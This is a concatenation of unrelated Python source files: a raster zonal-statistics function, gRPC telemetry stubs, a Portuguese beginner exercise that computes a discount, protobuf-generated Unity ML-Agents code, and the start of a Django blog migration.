        Which statistics to calculate for each zone.
        If a list, possible choices are subsets of
        ['mean', 'max', 'min', 'std', 'var']
        In the dictionary case, all of its values must be callable.
        Function takes only one argument that is the zone values.
        The key become the column name in the output DataFrame.

    Returns
    -------
    zonal_stats_df: pandas.DataFrame
        A pandas DataFrame where each column is a statistic
        and each row is a zone with zone id. Zone id 0 is treated
        as background and excluded.

    Raises
    ------
    ValueError
        If a stat name is unsupported (list case) or its value is not
        callable (dict case).
    """
    if zones.dtype in (np.float32, np.float64):
        # Float zone rasters are coerced (NaN -> 0) so they can serve as ids.
        # `np.int` was removed in NumPy 1.24; the builtin behaves identically.
        zones_val = np.nan_to_num(zones.values).astype(int)
    else:
        zones_val = zones.values
    values_val = values.values

    assert zones_val.shape == values_val.shape,\
        "`zones.values` and `values.values` must have same shape"
    assert issubclass(type(zones_val[0, 0]), np.integer),\
        "`zones.values` must be an array of integer"
    # `np.float` (removed in NumPy 1.24) aliased the builtin float, which
    # rejected float32 cells; np.floating accepts every NumPy float width.
    assert issubclass(type(values_val[0, 0]), np.integer) or\
        issubclass(type(values_val[0, 0]), np.floating),\
        "`values.values` must be an array of integer or float"

    unique_zones = np.unique(zones_val).astype(int)
    num_zones = len(unique_zones)
    # do not consider zone with 0s
    if 0 in unique_zones:
        num_zones = len(unique_zones) - 1

    # mask out all invalid values_val such as: nan, inf
    masked_values = np.ma.masked_invalid(values_val)

    if isinstance(stats, dict):
        # caller-supplied stat functions; keys become the output columns
        zonal_stats_df = pd.DataFrame(columns=list(stats.keys()))
        for zone_id in unique_zones:
            # do not consider 0 pixels as a zone
            if zone_id == 0:
                continue
            # restrict the masked value raster to this zone's cells
            zone_values = np.ma.masked_where(zones_val != zone_id,
                                             masked_values)
            zone_stats = []
            for stat in stats:
                stat_func = stats.get(stat)
                if not callable(stat_func):
                    raise ValueError(stat)
                zone_stats.append(stat_func(zone_values))
            zonal_stats_df.loc[zone_id] = zone_stats
    else:
        # named built-in stats, dispatched through masked-array methods
        builtin_funcs = {
            'mean': lambda zv: zv.mean(),
            'max': lambda zv: zv.max(),
            'min': lambda zv: zv.min(),
            'std': lambda zv: zv.std(),
            'var': lambda zv: zv.var(),
        }
        zonal_stats_df = pd.DataFrame(columns=stats)
        for zone_id in unique_zones:
            # do not consider 0 pixels as a zone
            if zone_id == 0:
                continue
            zone_values = np.ma.masked_where(zones_val != zone_id,
                                             masked_values)
            zone_stats = []
            for stat in stats:
                if stat not in builtin_funcs:
                    err_str = 'In function zonal_stats(). '\
                        + '\'' + stat + '\' option not supported.'
                    raise ValueError(err_str)
                zone_stats.append(builtin_funcs[stat](zone_values))
            zonal_stats_df.loc[zone_id] = zone_stats

    num_df_rows = len(zonal_stats_df.index)
    assert num_df_rows == num_zones, \
        'Output dataframe must have same number of rows as of zones.values'
    return zonal_stats_df
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from telemetry.v1beta3 import GenericEvents_Beta3_pb2 as telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2
from telemetry.v1beta3 import TelemetryService_Beta3_pb2 as telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2
class EventTelemetryStub(object):
  """Provides support for transmission of operational and experiential telemetry data from first and second-party devices.
  """

  def __init__(self, channel):
    """Constructor.

    Args:
      channel: A grpc.Channel.
    """
    # Each attribute is a unary-unary RPC callable bound to one
    # EventTelemetry service method on the given channel.
    self.Ping = channel.unary_unary(
        '/bloombox.schema.services.telemetry.v1beta3.EventTelemetry/Ping',
        request_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryPing.Request.SerializeToString,
        response_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryPing.Response.FromString,
        )
    self.Event = channel.unary_unary(
        '/bloombox.schema.services.telemetry.v1beta3.EventTelemetry/Event',
        request_serializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Event.Request.SerializeToString,
        response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
    self.Batch = channel.unary_unary(
        '/bloombox.schema.services.telemetry.v1beta3.EventTelemetry/Batch',
        request_serializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Event.BatchRequest.SerializeToString,
        response_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryResponse.FromString,
        )
    self.Error = channel.unary_unary(
        '/bloombox.schema.services.telemetry.v1beta3.EventTelemetry/Error',
        request_serializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Exception.SerializeToString,
        response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
class EventTelemetryServicer(object):
  """Provides support for transmission of operational and experiential telemetry data from first and second-party devices.
  """
  # Generated servicer base class: subclasses override these handlers with
  # real implementations; the defaults report UNIMPLEMENTED to the client.

  def Ping(self, request, context):
    """Ping the server.
    """
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def Event(self, request, context):
    """Submit a generic event.
    """
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def Batch(self, request, context):
    """Submit one or more generic events via the batch interface.
    """
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def Error(self, request, context):
    """Submit one or more exception events.
    """
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
def add_EventTelemetryServicer_to_server(servicer, server):
  """Register the handlers of *servicer* on *server* for the EventTelemetry service.

  Maps each RPC name ('Ping', 'Event', 'Batch', 'Error') to a unary-unary
  handler wired with the matching protobuf request deserializer and
  response serializer, then installs a generic handler under the full
  service name.
  """
  rpc_method_handlers = {
      'Ping': grpc.unary_unary_rpc_method_handler(
          servicer.Ping,
          request_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryPing.Request.FromString,
          response_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryPing.Response.SerializeToString,
      ),
      'Event': grpc.unary_unary_rpc_method_handler(
          servicer.Event,
          request_deserializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Event.Request.FromString,
          response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
      ),
      'Batch': grpc.unary_unary_rpc_method_handler(
          servicer.Batch,
          request_deserializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Event.BatchRequest.FromString,
          response_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.TelemetryResponse.SerializeToString,
      ),
      'Error': grpc.unary_unary_rpc_method_handler(
          servicer.Error,
          request_deserializer=telemetry_dot_v1beta3_dot_GenericEvents__Beta3__pb2.Exception.FromString,
          response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
      ),
  }
  generic_handler = grpc.method_handlers_generic_handler(
      'bloombox.schema.services.telemetry.v1beta3.EventTelemetry', rpc_method_handlers)
  server.add_generic_rpc_handlers((generic_handler,))
class CommercialTelemetryStub(object):
  """Provides support for tailored analytics payloads w.r.t. interactions between end-users and commercial models, like
  menu sections, products, and user orders.

  gRPC-generated client stub: each attribute set in the constructor is a
  callable unary-unary RPC bound to the supplied channel.
  """

  def __init__(self, channel):
    """Constructor.

    Args:
      channel: A grpc.Channel.
    """
    # Each multi-callable serializes the request proto and deserializes the
    # (google.protobuf.Empty) response.
    self.Impression = channel.unary_unary(
        '/bloombox.schema.services.telemetry.v1beta3.CommercialTelemetry/Impression',
        request_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.Impression.SerializeToString,
        response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
    self.View = channel.unary_unary(
        '/bloombox.schema.services.telemetry.v1beta3.CommercialTelemetry/View',
        request_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.View.SerializeToString,
        response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
    self.Action = channel.unary_unary(
        '/bloombox.schema.services.telemetry.v1beta3.CommercialTelemetry/Action',
        request_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.Action.SerializeToString,
        response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
class CommercialTelemetryServicer(object):
  """Provides support for tailored analytics payloads w.r.t. interactions between end-users and commercial models, like
  menu sections, products, and user orders.

  gRPC-generated server base class: subclass and override the handlers.
  Defaults respond with the gRPC UNIMPLEMENTED status code.
  """

  def Impression(self, request, context):
    """Register that a menu section was presented to a user, regardless of whether they acted on it or not.
    """
    # Default generated behavior: signal UNIMPLEMENTED to the remote caller.
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def View(self, request, context):
    """Register that a menu section was viewed, browsed-to, or otherwise served to a user.
    """
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')

  def Action(self, request, context):
    """Register that an end-user elected to take action within a section in some way.
    """
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
def add_CommercialTelemetryServicer_to_server(servicer, server):
  """Register the handlers of *servicer* on *server* for the CommercialTelemetry service.

  Wires 'Impression', 'View' and 'Action' as unary-unary handlers with the
  matching protobuf (de)serializers and installs them under the full
  service name.
  """
  rpc_method_handlers = {
      'Impression': grpc.unary_unary_rpc_method_handler(
          servicer.Impression,
          request_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.Impression.FromString,
          response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
      ),
      'View': grpc.unary_unary_rpc_method_handler(
          servicer.View,
          request_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.View.FromString,
          response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
      ),
      'Action': grpc.unary_unary_rpc_method_handler(
          servicer.Action,
          request_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.Action.FromString,
          response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
      ),
  }
  generic_handler = grpc.method_handlers_generic_handler(
      'bloombox.schema.services.telemetry.v1beta3.CommercialTelemetry', rpc_method_handlers)
  server.add_generic_rpc_handlers((generic_handler,))
class IdentityTelemetryStub(object):
  """Provides support for recording telemetry information about user events and actions related to their own identity,
  account, profile, preferences, and so on.

  gRPC-generated client stub: `Action` is a callable unary-unary RPC bound
  to the supplied channel.
  """

  def __init__(self, channel):
    """Constructor.

    Args:
      channel: A grpc.Channel.
    """
    self.Action = channel.unary_unary(
        '/bloombox.schema.services.telemetry.v1beta3.IdentityTelemetry/Action',
        request_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.IdentityEvent.Action.SerializeToString,
        response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
class IdentityTelemetryServicer(object):
  """Provides support for recording telemetry information about user events and actions related to their own identity,
  account, profile, preferences, and so on.

  gRPC-generated server base class: subclass and override `Action`.
  The default responds with the gRPC UNIMPLEMENTED status code.
  """

  def Action(self, request, context):
    """Register affirmative action taken by an end-user on their own account or identity.
    """
    # Default generated behavior: signal UNIMPLEMENTED to the remote caller.
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
def add_IdentityTelemetryServicer_to_server(servicer, server):
  """Register the handlers of *servicer* on *server* for the IdentityTelemetry service.

  Wires the single 'Action' RPC as a unary-unary handler with the matching
  protobuf (de)serializers and installs it under the full service name.
  """
  rpc_method_handlers = {
      'Action': grpc.unary_unary_rpc_method_handler(
          servicer.Action,
          request_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.IdentityEvent.Action.FromString,
          response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
      ),
  }
  generic_handler = grpc.method_handlers_generic_handler(
      'bloombox.schema.services.telemetry.v1beta3.IdentityTelemetry', rpc_method_handlers)
  server.add_generic_rpc_handlers((generic_handler,))
|
"""Ex 012 - Faça um algoritimo que leia o preço de um produto e mostre seu novo preço,
com 5% de desconto."""
print('-' * 10, '>Ex 012,', '-' * 10)
#Criando variáveis e recebendo dados.
val_pro = float(input('Qual valor do produto: R$'))
desc = 0.05
novo_val_pro = val_pro - val_pro * desc
#imprimindo dados para o usuário na tela.
print('O valor do produto é de........: R${:.2f}'.format(val_pro))
print('O desconto dado é equivalente a: {:.0f}%'.format(desc * 100))
print('O valor final do produto é de..: R${:.2f}'.format(novo_val_pro)) |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: mlagents/envs/communicator_objects/unity_rl_input.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from mlagents.envs.communicator_objects import agent_action_pb2 as mlagents_dot_envs_dot_communicator__objects_dot_agent__action__pb2
from mlagents.envs.communicator_objects import environment_parameters_pb2 as mlagents_dot_envs_dot_communicator__objects_dot_environment__parameters__pb2
from mlagents.envs.communicator_objects import command_pb2 as mlagents_dot_envs_dot_communicator__objects_dot_command__pb2
# Generated FileDescriptor for unity_rl_input.proto. The serialized_pb blob
# is the compiled proto definition; never edit it by hand — regenerate with
# protoc instead.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='mlagents/envs/communicator_objects/unity_rl_input.proto',
  package='communicator_objects',
  syntax='proto3',
  serialized_pb=_b('\n7mlagents/envs/communicator_objects/unity_rl_input.proto\x12\x14\x63ommunicator_objects\x1a\x35mlagents/envs/communicator_objects/agent_action.proto\x1a?mlagents/envs/communicator_objects/environment_parameters.proto\x1a\x30mlagents/envs/communicator_objects/command.proto\"\xc3\x03\n\x11UnityRLInputProto\x12P\n\ragent_actions\x18\x01 \x03(\x0b\x32\x39.communicator_objects.UnityRLInputProto.AgentActionsEntry\x12P\n\x16\x65nvironment_parameters\x18\x02 \x01(\x0b\x32\x30.communicator_objects.EnvironmentParametersProto\x12\x13\n\x0bis_training\x18\x03 \x01(\x08\x12\x33\n\x07\x63ommand\x18\x04 \x01(\x0e\x32\".communicator_objects.CommandProto\x1aM\n\x14ListAgentActionProto\x12\x35\n\x05value\x18\x01 \x03(\x0b\x32&.communicator_objects.AgentActionProto\x1aq\n\x11\x41gentActionsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12K\n\x05value\x18\x02 \x01(\x0b\x32<.communicator_objects.UnityRLInputProto.ListAgentActionProto:\x02\x38\x01\x42\x1f\xaa\x02\x1cMLAgents.CommunicatorObjects\x62\x06proto3')
  ,
  dependencies=[mlagents_dot_envs_dot_communicator__objects_dot_agent__action__pb2.DESCRIPTOR,mlagents_dot_envs_dot_communicator__objects_dot_environment__parameters__pb2.DESCRIPTOR,mlagents_dot_envs_dot_communicator__objects_dot_command__pb2.DESCRIPTOR,])
# Descriptor for the nested message UnityRLInputProto.ListAgentActionProto:
# wraps a repeated list of AgentActionProto values (the map-value type).
_UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO = _descriptor.Descriptor(
  name='ListAgentActionProto',
  full_name='communicator_objects.UnityRLInputProto.ListAgentActionProto',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='value', full_name='communicator_objects.UnityRLInputProto.ListAgentActionProto.value', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=511,
  serialized_end=588,
)

# Descriptor for the synthetic map-entry message backing the
# `agent_actions` map field (string key -> ListAgentActionProto value).
_UNITYRLINPUTPROTO_AGENTACTIONSENTRY = _descriptor.Descriptor(
  name='AgentActionsEntry',
  full_name='communicator_objects.UnityRLInputProto.AgentActionsEntry',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='key', full_name='communicator_objects.UnityRLInputProto.AgentActionsEntry.key', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='value', full_name='communicator_objects.UnityRLInputProto.AgentActionsEntry.value', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  # '8\001' sets the map_entry=True message option.
  options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=590,
  serialized_end=703,
)

# Descriptor for the top-level UnityRLInputProto message: agent actions map,
# environment parameters, training flag and command enum.
_UNITYRLINPUTPROTO = _descriptor.Descriptor(
  name='UnityRLInputProto',
  full_name='communicator_objects.UnityRLInputProto',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='agent_actions', full_name='communicator_objects.UnityRLInputProto.agent_actions', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='environment_parameters', full_name='communicator_objects.UnityRLInputProto.environment_parameters', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='is_training', full_name='communicator_objects.UnityRLInputProto.is_training', index=2,
      number=3, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='command', full_name='communicator_objects.UnityRLInputProto.command', index=3,
      number=4, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[_UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO, _UNITYRLINPUTPROTO_AGENTACTIONSENTRY, ],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=252,
  serialized_end=703,
)
# Resolve cross-references between descriptors (message and enum field
# types) that could not be supplied at construction time.
_UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO.fields_by_name['value'].message_type = mlagents_dot_envs_dot_communicator__objects_dot_agent__action__pb2._AGENTACTIONPROTO
_UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO.containing_type = _UNITYRLINPUTPROTO
_UNITYRLINPUTPROTO_AGENTACTIONSENTRY.fields_by_name['value'].message_type = _UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO
_UNITYRLINPUTPROTO_AGENTACTIONSENTRY.containing_type = _UNITYRLINPUTPROTO
_UNITYRLINPUTPROTO.fields_by_name['agent_actions'].message_type = _UNITYRLINPUTPROTO_AGENTACTIONSENTRY
_UNITYRLINPUTPROTO.fields_by_name['environment_parameters'].message_type = mlagents_dot_envs_dot_communicator__objects_dot_environment__parameters__pb2._ENVIRONMENTPARAMETERSPROTO
_UNITYRLINPUTPROTO.fields_by_name['command'].enum_type = mlagents_dot_envs_dot_communicator__objects_dot_command__pb2._COMMANDPROTO
DESCRIPTOR.message_types_by_name['UnityRLInputProto'] = _UNITYRLINPUTPROTO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

# Build the concrete message classes from the descriptors via the
# GeneratedProtocolMessageType metaclass, then register them with the
# default symbol database.
UnityRLInputProto = _reflection.GeneratedProtocolMessageType('UnityRLInputProto', (_message.Message,), dict(

  ListAgentActionProto = _reflection.GeneratedProtocolMessageType('ListAgentActionProto', (_message.Message,), dict(
    DESCRIPTOR = _UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO,
    __module__ = 'mlagents.envs.communicator_objects.unity_rl_input_pb2'
    # @@protoc_insertion_point(class_scope:communicator_objects.UnityRLInputProto.ListAgentActionProto)
    ))
  ,

  AgentActionsEntry = _reflection.GeneratedProtocolMessageType('AgentActionsEntry', (_message.Message,), dict(
    DESCRIPTOR = _UNITYRLINPUTPROTO_AGENTACTIONSENTRY,
    __module__ = 'mlagents.envs.communicator_objects.unity_rl_input_pb2'
    # @@protoc_insertion_point(class_scope:communicator_objects.UnityRLInputProto.AgentActionsEntry)
    ))
  ,
  DESCRIPTOR = _UNITYRLINPUTPROTO,
  __module__ = 'mlagents.envs.communicator_objects.unity_rl_input_pb2'
  # @@protoc_insertion_point(class_scope:communicator_objects.UnityRLInputProto)
  ))
_sym_db.RegisterMessage(UnityRLInputProto)
_sym_db.RegisterMessage(UnityRLInputProto.ListAgentActionProto)
_sym_db.RegisterMessage(UnityRLInputProto.AgentActionsEntry)

# File-level options: the csharp_namespace ('MLAgents.CommunicatorObjects');
# map_entry=True re-applied on the synthetic map-entry message.
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\252\002\034MLAgents.CommunicatorObjects'))
_UNITYRLINPUTPROTO_AGENTACTIONSENTRY.has_options = True
_UNITYRLINPUTPROTO_AGENTACTIONSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
# @@protoc_insertion_point(module_scope)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-08-23 19:54
from __future__ import unicode_literals
import collective_blog.models.blog
import collective_blog.models.comment
import collective_blog.models.post
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import mptt.fields
import s_markdown.datatype
import s_markdown.extensions.autolink
import s_markdown.extensions.automail
import s_markdown.extensions.comment
import s_markdown.extensions.cut
import s_markdown.extensions.escape
import s_markdown.extensions.fenced_code
import s_markdown.extensions.semi_sane_lists
import s_markdown.extensions.strikethrough
import s_markdown.models
import s_markdown.renderer
import s_voting.models
import taggit.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Blog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, unique=True, verbose_name='Name')),
('slug', models.SlugField(blank=True, editable=False, max_length=100, unique=True)),
('about', s_markdown.models.MarkdownField(blank=True, cls_name='about_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), renderer_name='about_renderer', verbose_name='About this blog')),
('_about_html', s_markdown.models.HtmlCacheField(blank=True, editable=False, markdown_field=s_markdown.models.MarkdownField(blank=True, cls_name='about_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), renderer_name='about_renderer', verbose_name='About this blog'), null=True)),
('icon', models.CharField(blank=True, choices=[('aircraft', 'aircraft'), ('aircraft-take-off', 'aircraft take off'), ('aircraft-landing', 'aircraft landing'), ('area-graph', 'area graph'), ('archive', 'archive'), ('attachment', 'attachment'), ('awareness-ribbon', 'awareness ribbon'), ('back-in-time', 'back in time'), ('bar-graph', 'bar graph'), ('beamed-note', 'beamed note'), ('bell', 'bell'), ('blackboard', 'blackboard'), ('book', 'book'), ('bowl', 'bowl'), ('bookmarks', 'bookmarks'), ('box', 'box'), ('briefcase', 'briefcase'), ('brush', 'brush'), ('bucket', 'bucket'), ('bug', 'bug'), ('cake', 'cake'), ('camera', 'camera'), ('chat', 'chat'), ('clapperboard', 'clapperboard'), ('classic-computer', 'classic computer'), ('clipboard', 'clipboard'), ('cloud', 'cloud'), ('code', 'code'), ('cog', 'cog'), ('colours', 'colours'), ('compass', 'compass'), ('database', 'database'), ('dial-pad', 'dial pad'), ('documents', 'documents'), ('feather', 'feather'), ('flag', 'flag'), ('flash', 'flash'), ('flashlight', 'flashlight'), ('flat-brush', 'flat brush'), ('flow-branch', 'flow branch'), ('flower', 'flower'), ('folder', 'folder'), ('info-with-circle', 'info with circle'), ('infinity', 'infinity'), ('image', 'image'), ('hand', 'hand'), ('hair-cross', 'hair cross'), ('grid', 'grid'), ('graduation-cap', 'graduation cap'), ('globe', 'globe'), ('lab-flask', 'lab flask'), ('landline', 'landline'), ('keyboard', 'keyboard'), ('key', 'key'), ('layers', 'layers'), ('laptop', 'laptop'), ('leaf', 'leaf'), ('lifebuoy', 'lifebuoy'), ('light-bulb', 'light bulb'), ('light-up', 'light up'), ('line-graph', 'line graph'), ('location-pin', 'location pin'), ('modern-mic', 'modern mic'), ('moon', 'moon'), ('mic', 'mic'), ('medal', 'medal'), ('mail', 'mail'), ('magnet', 'magnet'), ('mouse-pointer', 'mouse pointer'), ('mouse', 'mouse'), ('network', 'network'), ('palette', 'palette'), ('new-message', 'new message'), ('new', 'new'), ('newsletter', 'newsletter'), ('note', 'note'), ('paper-plane', 'paper 
plane'), ('phone', 'phone'), ('rocket', 'rocket'), ('radio', 'radio'), ('print', 'print'), ('price-tag', 'price tag'), ('shop', 'shop'), ('suitcase', 'suitcase'), ('tablet-mobile-combo', 'tablet mobile combo'), ('thunder-cloud', 'thunder cloud'), ('ticket', 'ticket'), ('time-slot', 'time slot'), ('tools', 'tools'), ('traffic-cone', 'traffic cone'), ('tree', 'tree'), ('tv', 'tv'), ('video-camera', 'video camera'), ('video', 'video'), ('vinyl', 'vinyl'), ('voicemail', 'voicemail'), ('wallet', 'wallet'), ('warning', 'warning'), ('water', 'water')], max_length=100)),
('type', models.CharField(choices=[('O', 'Open'), ('P', 'Private')], default='0', max_length=2, verbose_name='Type of the blog')),
('join_condition', models.CharField(choices=[('A', 'Anyone can join'), ('K', 'Only users with high karma can join'), ('I', 'Manual approval required')], default='A', max_length=2, verbose_name='Who can join the blog')),
('join_karma_threshold', models.SmallIntegerField(default=0, verbose_name='Join karma threshold')),
('post_condition', models.CharField(choices=[('A', 'Anyone can add posts'), ('K', 'Only users with high karma can add posts')], default='K', max_length=2, verbose_name='Who can add posts')),
('post_membership_required', models.BooleanField(default=True, verbose_name='Require membership to write posts')),
('post_admin_required', models.BooleanField(default=False, verbose_name='Only admins can write posts')),
